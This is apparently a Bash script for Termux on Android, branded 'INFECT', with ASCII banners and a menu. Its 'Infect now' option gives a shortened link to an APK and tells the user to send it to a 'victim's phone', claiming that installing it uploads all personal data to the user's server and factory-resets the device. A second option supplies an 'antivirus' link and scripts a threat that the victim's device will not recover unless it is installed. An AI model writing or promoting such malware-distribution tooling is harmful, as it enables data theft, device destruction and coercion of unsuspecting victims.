
# A tool by @krishlalwani0
# Colours
#-----------------
red="\e[91m"
rset="\e[0m"
grn="\e[92m"
ylo="\e[93m"
blue="\e[94m"
cyan="\e[96m"
pink="\e[95m"
#-----------------
# scripting start
banner(){
vid
echo -e '\e[93m               
                         __________
                      .~#########%%;~.
                     /############%%;`\
                    /######/~\/~\%%;,;,\
                   |#######\    /;;;;.,.|
                   |#########\/%;;;;;.,.|
          XX       |##/~~\####%;;;/~~\;,|       XX
        XX..X      |#|  o  \##%;/  o  |.|      X..XX
      XX.....X     |##\____/##%;\____/.,|     X.....XX
 XXXXX.....XX      \#########/\;;;;;;,, /      XX.....XXXXX
X |......XX%,.@      \######/%;\;;;;, /      @#%,XX......| X
X |.....X  @#%,.@     |######%%;;;;,.|     @#%,.@  X.....| X'
echo -e '\e[92mX  \...X     @#%,.@   ----------------    @ @ 00 0 xxxxxxxxx
 X# \.X        @#%,.@   INFECT V2.1      @#%,.@        
                @#%,.@              @#%,.@          
                  @#%,.@          @#%,.@            
                     @#%,.@      @#%,.@             
                       @#%.,@  @#%,.@              
                        Krish Lalwani 
'
echo " " 
echo -e "$red                       â–¶Coded by$grn Krish Lalwani$redâ—€$rset"
echo -e "$red                      â«¸$ylo  Krish Lalwani$red â«·$rset"
echo 
# Functions
echo -e "$red                    [Infect them with fun]$rset"
echo " "
echo " "
}
baner1(){
clear
echo -e '\e[93m               
                         __________
                      .~#########%%;~.
                     /############%%;`\
                    /######/~\/~\%%;,;,\
                   |#######\    /;;;;.,.|
                   |#########\/%;;;;;.,.|
          XX       |##/~~\####%;;;/~~\;,|       XX
        XX..X      |#|  o  \##%;/  o  |.|      X..XX
      XX.....X     |##\____/##%;\____/.,|     X.....XX
 XXXXX.....XX      \#########/\;;;;;;,, /      XX.....XXXXX
X |......XX%,.@      \######/%;\;;;;, /      @#%,XX......| X
X |.....X  @#%,.@     |######%%;;;;,.|     @#%,.@  X.....| X'
echo -e '\e[92mX  \...X     @#%,.@   ----------------    @ @ 00 0 xxxxxxxxx
 X# \.X        @#%,.@   INFECT V2.2      @#%,.@        
                @#%,.@              @#%,.@          
                  @#%,.@          @#%,.@            
                     @#%,.@      @#%,.@             
                       @#%.,@  @#%,.@              
                        Krish Lalwani 
'
echo " " 
echo -e "$red                       â–¶Coded by$grn Krish Lalwani$redâ—€$rset"
echo -e "$red                      â«¸$ylo Krish Lalwani$red â«·$rset"
echo 
# Functions
echo -e "$red                    [Infect them with fun]$rset"
echo " "
echo " "
}
menu(){
echo -e "$grn             ï¼žï¼žï¼žï¼ž>>>ï¼ž$ylo [Options]$grn ï¼œ<<<ï¼œï¼œï¼œï¼œ$rset"
echo " "
echo " "
echo -e "$red                        âž¡$cyan [\e[92m1\e[96m] Infect now"
echo -e "$red                        âž¡$cyan [\e[92m2\e[96m] Save now"
echo -e "$red                        âž¡$cyan [\e[92m3\e[96m] About"
echo -e "$red                        âž¡$cyan [\e[92m4\e[96m] Update script "
echo -e "$red                        âž¡$cyan [\e[92m5\e[96m] Instagram"
echo -e "$red                        âž¡$cyan [\e[92m6\e[96m] More"
echo -e "$red                        âž¡$cyan [\e[92m7\e[96m] Chat"
echo -e "$red                        âž¡$cyan [\e[92m8\e[96m] Exit"
echo " "
echo " "
echo -e "$grn               >ï¼žï¼žï¼žï¼žï¼ž$ylo [SELECT]$grn ï¼œï¼œï¼œï¼œï¼œ<$rset"
echo " "
echo -ne "\e[92m#SELECT OPTION\e[92m: "
read optnz
if [ $optnz = "1" ];
then
virus
elif [ $optnz = "2" ];
then
save
elif [ $optnz = "3" ];
then
about
elif [ $optnz = "4" ];
then
upd
elif [ $optnz = "5" ];
then
am start -a android.intent.action.VIEW -d https://instagram.com/krishealty  > /dev/null 2>&1
banner
menu
elif [ $optnz = "6" ];
then
am start -a android.intent.action.VIEW -d https://github.com/krishlalwani0 > /dev/null 2>&1
banner
menu
elif [ $optnz = "7" ];
then
am start -a android.intent.action.VIEW -d https://Instagram.com/krishealty  > /dev/null 2>&1
banner
menu
elif [ $optnz = "8" ];
then
exit 1
else
echo "Error. Please choose the right option."
exit
fi
}
virus(){
################
clear
echo
echo -e '\e[92m 
                    _  _  _____  ____  ____ 
                   ( \( )(  _  )(_  _)( ___)
                    )  (  )(_)(   )(   )__) 
                   (_)\_)(_____) (__) (____) '
echo " "
echo -e "\e[91m Copy below link and send it to victim's phone.
The moment he installs the apk file, all his personal data will be
 sent to your server and it's phone will be factory resetted.
                                ðŸ‘‡ðŸ‘‡ðŸ‘‡
         \e[92mL1NK :- \e[96mhttps://bit.ly/3ild93L\e[91m
                                 ðŸ‘†ðŸ‘†ðŸ‘†
Usage allowed only for penetration purposes. Author is not responsible for any 
personal loss"
echo
echo -ne "\e[92m#Type exit : "
read exitz
if [ $exitz = "Exit" ];
then
banner
menu
else
banner
menu
fi
}
save(){
clear
echo
echo -e '\e[92m 
                    _  _  _____  ____  ____ 
                   ( \( )(  _  )(_  _)( ___)
                    )  (  )(_)(   )(   )__) 
                   (_)\_)(_____) (__) (____) '
echo " "
echo " "
echo -e "\e[93m  [ANTIVIRUS] Copy below link and send it your victim and tell him
that he should install this application or else his 
device will not be recovered.(Antivirus)
                    ðŸ‘‡ðŸ‘‡ðŸ‘‡
        \e[92mL1NK :- \e[96mhttps://bit.ly/3fX8ljZ\e[93m
                    ðŸ‘†ðŸ‘†ðŸ‘†
Don't use antivirus without virus apk as it can lead to malfunctioning of the device."
echo
echo -ne "\e[92m#Type exit : "
read exitz
if [ $exitz = "exit" ];
then
banner
menu
else
banner
menu
fi
}
about(){
clear
echo -e '\e[91m
         â”€â”€â–â”€â–Œâ”€â”€â–â”€â–Œâ”€â”€
         â”€â–â–Œâ”€â–â–Œâ–â–Œâ”€â–â–Œâ”€
         â”€â–ˆâ–„â–€â–„â–ˆâ–ˆâ–„â–€â–„â–ˆâ”€
         â”€â”€â–„â”€â”€â–ˆâ–ˆâ–Œâ”€â–„â”€â”€
         â–„â–€â”€â–ˆâ–€â–ˆâ–ˆâ–€â–ˆâ”€â–€â–„
         â–â–Œâ–â–Œâ”€â–â–Œâ”€â–â–Œâ–â–Œ
         â”€â–â”€â–ˆâ”€â”€â”€â”€â–ˆâ”€â–Œâ”€
         â”€â”€â”€â”€â–Œâ”€â”€â–â”€â”€â”€â”€
'
sleep 6.0
banner
menu
}
upd(){
if [ -d "$HOME/infect" ];
then
cd $HOME
rm -rf infect
elif [ -d "$HOME/Infect" ];
then
cd $HOME
rm -rf Infect
else
echo
exit 1
fi
cd $HOME
sleep 1
echo -e "         \e[96mUpdating, Please wait...\e[0m"
echo
printf "                     \e[96m["
# While process is running...
while git clone https://github.com/noob-hackers/infect 2> /dev/null; do 
    printf  "\e[92mâ–“â–“â–“â–“â–“â–“â–“â–“â–“â–“â–“â–“â–“\e[0m"
    sleep 1
done
printf "\e[96m]\e[0m"
echo
echo
echo
printf "\e[96m           UPDATE SUCCESSFULL (LATEST VERSION)..!\e[0m"
sleep 2.0
cd $HOME
cd infect
bash infect.sh
}
vid(){
FILE=$HOME/infect/noob.noob
if [ -f "$FILE" ]; then
pop
else
echo
fi
}
pop(){
clear
echo -e "\e[96m                â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—\e[0m"
echo -e "\e[96m                â•‘  \e[93mTHE QUITER YOU \e[96m BECOME  â•‘\e[0m"
echo -e "\e[96m                â•‘      THE MORE YOU ARE ABLE TO HEAR.    â•‘\e[0m"
echo -e "\e[96m                â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•\e[0m"
echo -en "\e[32mSELECT OPTION [\e[93my/\e[93mt/\e[32m\e[93mz\e[32m]: \e[0m "
read p
if [ "$p" = "y" ];
then
am start -a android.intent.action.VIEW -d https://github.com/krishlalwani0 2>/dev/null
clear
baner1
menu
elif [ "$p" = "t" ];
then
clear
baner1
menu
elif [ "$p" = "z" ];
then
cd $HOM/infect
rm noob.noob
banner
menu
else
banner
menu
exit
fi
}
banner
menu
